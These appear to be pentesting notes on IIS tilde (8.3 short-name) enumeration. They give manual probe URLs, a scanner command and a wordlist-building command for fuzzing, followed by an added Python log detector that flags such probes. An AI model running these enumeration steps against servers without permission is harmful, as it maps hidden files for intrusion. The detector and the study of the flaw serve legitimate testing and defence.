IIS Tilde Enumeration
IIS Tilde Enumeration (also known as IIS Short Name Disclosure or 8.3 Name Disclosure) is a vulnerability in Microsoft Internet Information Services (IIS) where attackers can enumerate files and directories using their short (8.3) names. Windows supports legacy 8.3 filenames (e.g., longfilename.txt → LONGFI~1.TXT), and IIS may expose these names due to improper handling of tilde (~) characters in URL requests. This allows attackers to infer the presence of files and folders, even if directory listing is disabled. By sending crafted HTTP requests with ~1, ~2, etc., attackers can systematically determine file and folder names, leading to potential information disclosure and aiding further exploitation. This issue affects IIS versions up to IIS 8.5 unless mitigated by disabling 8.3 filename support or applying security patches.
Enumeration
- Nmap to find which port runs IIS.
- Bruteforce Manually
## Example: 'Chocolate' directory exists.
http://rezydev.xyz/~a ## invalid
http://rezydev.xyz/~b ## invalid
http://rezydev.xyz/~c ## 200 OK, so a directory with 1st letter c exists.
http://rezydev.xyz/~ca ## invalid
http://rezydev.xyz/~cb ## invalid
http://rezydev.xyz/~cc ## invalid
//..SNIP..//
http://rezydev.xyz/~ch ## 200 OK, so a directory with 2nd letter h exists.
## Once we find the shortname
http://rezydev.com/choco~1.txt
file~1.txt ⇒ file.txt
file~2.txt ⇒ file1.txt
- Automated Tool (IIS Short Name Scanner)
java -jar iis_shortname_scanner.jar 0 20 http://rezydev.xyz/
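The probe pattern walked through above (one-letter `~c`, two-letter `~ch`, then `choco~1.txt`) is easy to spot in IIS W3C logs. Added example, not part of the original notes: a small Python detector that parses constructed log lines (the log excerpt, IPs and threshold are all made up here) and flags clients issuing repeated tilde probes, while a single `~name` hit such as a user directory stays below the threshold.

```python
import re
from collections import defaultdict

# Constructed IIS W3C extended log excerpt (sample data, not real traffic).
SAMPLE_LOG = """#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2024-01-01 10:00:01 GET /~a - 203.0.113.7 404
2024-01-01 10:00:01 GET /~c - 203.0.113.7 200
2024-01-01 10:00:02 GET /~ca - 203.0.113.7 404
2024-01-01 10:00:02 GET /~ch - 203.0.113.7 200
2024-01-01 10:00:03 GET /choco~1.txt - 203.0.113.7 200
2024-01-01 10:00:04 GET /index.html - 198.51.100.2 200
2024-01-01 10:00:05 GET /~user/page.html - 198.51.100.2 200
"""

# 8.3 short-name form: up to 6 name chars, '~', a digit, optional 3-char extension.
SHORTNAME = re.compile(r"^[A-Za-z0-9_-]{1,6}~[1-9]\d*(\.[A-Za-z0-9]{1,3})?$")
# Letter-by-letter probe form from the manual walkthrough: '~c', '~ch', ...
PREFIX_PROBE = re.compile(r"^~[A-Za-z0-9]{1,6}$")

def parse_w3c(text):
    """Yield one dict per entry, keyed by the names in the #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def is_tilde_probe(uri_stem):
    """True if any path segment looks like an 8.3 short-name or prefix probe."""
    return any(SHORTNAME.match(seg) or PREFIX_PROBE.match(seg)
               for seg in uri_stem.split("/") if seg)

def detect(text, threshold=3):
    """Return {client_ip: sorted distinct probe paths} for clients at/over threshold.
    The threshold (assumed value) keeps a lone '~user' style URL from alerting."""
    probes = defaultdict(set)
    for entry in parse_w3c(text):
        if is_tilde_probe(entry["cs-uri-stem"]):
            probes[entry["c-ip"]].add(entry["cs-uri-stem"])
    return {ip: sorted(p) for ip, p in probes.items() if len(p) >= threshold}

if __name__ == "__main__":
    for ip, paths in detect(SAMPLE_LOG).items():
        print(f"{ip}: {len(paths)} tilde probes, e.g. {paths[:3]}")
```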
Other Notable Automated Tools:
After Finding Shortnames
We won't be able to access the files/pages by their shortnames, e.g. http://rezydev.xyz/choco~1.asp, because IIS won't serve content via an 8.3 name in a GET request; the tilde response only confirms that the file exists. Since we now know the first few letters of the filename, we can generate a targeted wordlist.
egrep -r ^file /usr/share/wordlist/* | sed 's/^[^:]*://' > iisenum_list.txt
Then Fuzz using any tool of choice: